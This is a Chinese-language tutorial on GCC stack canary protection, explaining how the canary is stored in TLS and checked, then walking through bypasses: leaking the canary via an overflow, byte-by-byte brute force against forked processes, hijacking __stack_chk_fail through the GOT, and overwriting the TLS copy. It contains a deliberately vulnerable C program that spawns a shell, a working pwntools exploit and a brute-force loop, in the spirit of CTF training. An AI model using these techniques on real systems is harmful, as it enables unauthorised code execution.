1.原理在GCC中使用canary -fstack-protector 启用保护,不过只为局部变量中含有数组的函数插入保护 -fstack-protector-all 启用保护,为所有函数插入保护 -fstack-protector-strong -fstack-protector-explicit 只对有明确 stack_protect attribute 的函数开启保护 -fno-stack-protector 禁用保护 实现原理开启了canary后,栈如下:
Canary
当程序启用 Canary 编译后,在函数序言部分会取 fs 寄存器 0x28 处的值,存放在栈中 %ebp-0x8 的位置。 这个操作即为向栈中插入 Canary 值.在函数返回之前,会将该值取出,并与 fs:0x28 的值进行异或。如果异或的结果为 0,说明 Canary 未被修改,函数会正常返回,这个操作即为检测是否发生栈溢出。 如果 Canary 已经被非法修改,此时程序流程会走到 __stack_chk_fail 进一步,对于 Linux 来说,fs 寄存器实际指向的是当前栈的 TLS 结构,fs:0x28 指向的正是 stack_guard。 typedef struct
{
void *tcb; /* Pointer to the TCB. Not necessarily the
thread descriptor used by libpthread. */
dtv_t *dtv;
void *self; /* Pointer to the thread descriptor. */
int multiple_threads;
uintptr_t sysinfo;
uintptr_t stack_guard;
...
} tcbhead_t;
如果存在溢出可以覆盖位于 TLS 中保存的 Canary 值那么就可以实现绕过保护机制。 事实上,TLS 中的值由函数 security_init 进行初始化。 static void
security_init (void)
{
// _dl_random的值在进入这个函数的时候就已经由kernel写入.
// glibc直接使用了_dl_random的值并没有给赋值
// 如果不采用这种模式, glibc也可以自己产生随机数
//将_dl_random的最后一个字节设置为0x0
uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);
// 设置Canary的值到TLS中
THREAD_SET_STACK_GUARD (stack_chk_guard);
_dl_random = NULL;
}
//THREAD_SET_STACK_GUARD宏用于设置TLS
#define THREAD_SET_STACK_GUARD(value) \
THREAD_SETMEM (THREAD_SELF, header.stack_guard, value)
2.Canary绕过1.leak canaryCanary 设计为以字节 \x00 结尾,本意是为了保证 Canary 可以截断字符串。 泄露栈中的 Canary 的思路是覆盖 Canary 的低字节,来打印出剩余的 Canary 部分。 这种利用方式需要存在合适的输出函数,并且可能需要第一溢出泄露 Canary,之后再次溢出控制执行流程。 // ex2.c
#include
#include
#include
#include
void getshell(void) {
system("/bin/sh");
}
void init() {
setbuf(stdin, NULL);
setbuf(stdout, NULL);
setbuf(stderr, NULL);
}
void vuln() {
char buf[100];
for(int i=0;i<2;i++){
read(0, buf, 0x200);
printf(buf);
}
}
int main(void) {
init();
puts("Hello Hacker!");
vuln();
return 0;
}
编译为 32bit 程序并关闭 PIE 保护 (默认开启 NX,ASLR,Canary 保护) $gcc -m32 -no-pie ex2.c -o ex2 首先通过覆盖 Canary 最后一个 \x00 字节来打印出 4 位的 Canary 之后,计算好偏移,将 Canary 填入到相应的溢出位置,实现 Ret 到 getshell 函数中 #!/usr/bin/env python
from pwn import *
context.binary = 'ex2'
#context.log_level = 'debug'
io = process('./ex2')
get_shell = ELF("./ex2").sym["getshell"]
io.recvuntil("Hello Hacker!\n")
# leak Canary
payload = "A"*100
io.sendline(payload)
io.recvuntil("A"*100)
Canary = u32(io.recv(4))-0xa
log.info("Canary:"+hex(Canary))
# Bypass Canary
payload = "\x90"*100+p32(Canary)+"\x90"*12+p32(get_shell)
io.send(payload)
io.recv()
io.interactive()
Canary
'\x0a'换行将canary最后的/x00覆盖,所以也输出了。 2.one-by-one爆破Canary对于 Canary,虽然每次进程重启后的 Canary 不同 (相比 GS,GS 重启后是相同的),但是同一个进程中的不同线程的 Canary 是相同的, 并且 通过 fork 函数创建的子进程的 Canary 也是相同的,因为 fork 函数会直接拷贝父进程的内存。我们可以利用这样的特点,彻底逐个字节将 Canary 爆破出来。 在著名的 offset2libc 绕过 linux64bit 的所有保护的文章中,作者就是利用这样的方式爆破得到的 Canary: 这是爆破的 Python 代码: print "[+] Brute forcing stack canary "
start = len(p)
stop = len(p)+8
while len(p) < stop:
for i in xrange(0,256):
res = send2server(p + chr(i))
if res != "":
p = p + chr(i)
#print "\t[+] Byte found 0x%02x" % i
break
if i == 255:
print "[-] Exploit failed"
sys.exit(-1)
canary = p[stop:start-1:-1].encode("hex")
print " [+] SSP value is 0x%s" % canary
3.劫持__stack_chk_fail 函数已知 Canary 失败的处理逻辑会进入到 __stack_chk_failed 函数,__stack_chk_failed 函数是一个普通的延迟绑定函数,可以通过修改 GOT 表劫持这个函数 4.覆盖 TLS 中储存的 Canary 值已知 Canary 储存在 TLS 中,在函数返回前会使用这个值进行对比。当溢出尺寸较大时,可以同时覆盖栈上储存的 Canary 和 TLS 储存的 Canary 实现绕过。 参见 StarCTF2018 babystack https://eternalsakura13.com/2018/04/24/starctf_babystack/
|